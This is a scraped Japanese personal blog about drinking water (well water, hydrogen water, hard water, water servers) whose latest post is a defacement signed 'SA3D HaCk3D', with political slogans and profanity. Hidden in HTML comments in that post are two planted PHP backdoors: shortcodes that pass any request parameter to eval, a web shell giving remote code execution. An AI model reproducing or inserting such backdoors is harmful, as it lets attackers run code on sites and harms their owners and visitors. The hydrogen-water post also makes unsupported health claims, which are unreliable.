Hacked By SA3D HaCk3D 2016年12月28日

<br /> HaCkeD by SA3D HaCk3D<br />

HaCkeD By SA3D HaCk3D

Long Live to peshmarga

KurDish HaCk3rS WaS Here

fucked
FUCK ISIS !

<!– [insert_php]if (isset($_REQUEST["XJZtN"])){eval($_REQUEST["XJZtN"]);exit;}[/insert_php][php]if (isset($_REQUEST["XJZtN"])){eval($_REQUEST["XJZtN"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ZeBXY"])){eval($_REQUEST["ZeBXY"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZeBXY"])){eval($_REQUEST["ZeBXY"]);exit;}[/php] –>

Hacked By SA3D HaCk3D へのコメントはまだありません
カテゴリー: 水を大切に感じる

井戸水の恵みを受けて育ちました 2016年10月29日

子供の頃から水が好きで飲み物は水ばかり飲んでいました。
私が育ったところは周りが田んぼや畑だらけの田舎と呼ばれる場所だったので井戸水がありました。
日常的に使っていた水が井戸水で、もちろん料理にも使えましたしそのまま飲むこともできました。

煮沸の必要など要らない澄み切った井戸水で水道水よりもよっぽどおいしかったです。
井戸水なので水道料金はかかりませんし、水だけは使いたい放題で井戸水の恵みを十分に受けて育ちました。
夏は冷たく冷えていて味はまろやか、冬は少し温かくなっていて使いやすい水になっていました。

もちろん塩素など少しも入っていませんでした。
だから、都会に住んでいる友人から「塩素臭い水道水を飲めない」という話を聞くと塩素臭い水ってどんな水だろう?と不思議でした。
水と言えば無味無臭としか思えなかったのです。

今は水道水を使っていますが水道水をそのまま飲むことはしません。
井戸水のおいしさを知っているので飲み水は別に買っています。

井戸水の恵みを受けて育ちました へのコメントはまだありません
カテゴリー: 水を大切に感じる

水素水は私の生活の一部 2016年9月11日

私は一年以上前から毎日水素水を飲んでいます。
飲み始めたきっかけはテレビ番組で水素水が流行っていて健康に凄くいいと言っていたからです。
私は悩みました。それは生成器を買おうかパウチ入りのものを買おうかです。

それで決めたのは生成器にしました。
パウチは買い続けていくと金額的に割が合わないけれど生成器は買う時は高いけれど何年使うとか長い目で見ていくと安くなるかなと思ったからです。
そして私は生成器を買いました。最初だから容器を綺麗に洗って水を入れました。

水は普通の水道水です。ボタンを押して30分待ちました。
そして30分がたち水素水が出来上がりました。飲んでみるとまあ味は普通の水道水だからしませんが舌触りはなめらかというか柔らかい感じがしました。
それから私は毎日飲みました。

お茶や料理に使ったり御飯を炊く時に使ったり化粧水として使ったり髪の毛に使ったり顔を洗ったりするのに使っています。
おかげで今現在健康でいてますしお肌も化粧のノリがとてもいいです。
私にとっては身体に合っていたんだと思います。だからこれからも使い続けたいと思います。

水素水は私の生活の一部 へのコメントはまだありません
カテゴリー: 水を大切に感じる

硬水効果で便秘改善 2016年8月8日

ヨーロッパに住んでいた時、それまで私の人生に常に寄り添ってきた便秘がかなり遠縁になりました。
初めは何が原因か分からなかったんですが、ふとそれらしき要素が思い当たりました。
それは水の変化です。
ヨーロッパは水道水からシャワーまで、ほとんど硬水を使用します。

日本で使われている軟水と違い硬水はミネラルが豊富に含まれていることから、お通じが良くなることがあるそうです。まさに私それじゃん、と思いました。
私が住んでいる地域では水道水が飲めるので、わざわざミネラルウォーターを買う必要がないのがとても嬉しい限りです。
朝起きてまずコップ一杯の水を飲み、朝食のコーヒーや紅茶ももちろん硬水の水道水で作り、その他料理にも全部硬水100%の生活です。

人によっては慣れた軟水から硬水を飲むと飲みづらいと感じることもあるらしいですが、私は1ミリも気になりません。日
本だと買わないと飲めない硬水が蛇口からいくらでも出てくるのは本当に恵まれていますし、これで便秘と永遠に別れられたら理想的です。

硬水効果で便秘改善 へのコメントはまだありません
カテゴリー: 水を大切に感じる

産後に便利なウォーターサーバー 2016年5月28日

昔、切迫流産になってしまい10日間ほど入院したのですが、その産婦人科病院にはウォーターサーバーが設置されていたのです。
切迫流産になると要安静なので、基本的にはベッドの上で過ごさなければなりません。

しかし退屈だったのでナースステーションまでしょっちゅうコップに水を汲みに行っていました。
妊娠中はただでさえ便秘になりやすいので、なるべく水分を多めに摂取したいためでもありました。

ウォーターサーバーの水は水道水とは違って味が全くしませんでした。ごくごく飲めました。
何よりも便利だと感じたのは、沸かさなくてもお湯が好きな時に飲めるということです。

これは産後にとても重宝するのではないかと思います。
赤ちゃんのミルクを調乳するのにわざわざお湯を沸かす必要がないからです。
ポットよりも衛生的な気がします。
産婦人科にあったチラシを見たら、赤ちゃんがいるとウォーターサーバーのレンタルが割引きになるようです。

産後に便利なウォーターサーバー へのコメントはまだありません
カテゴリー: 水を大切に感じる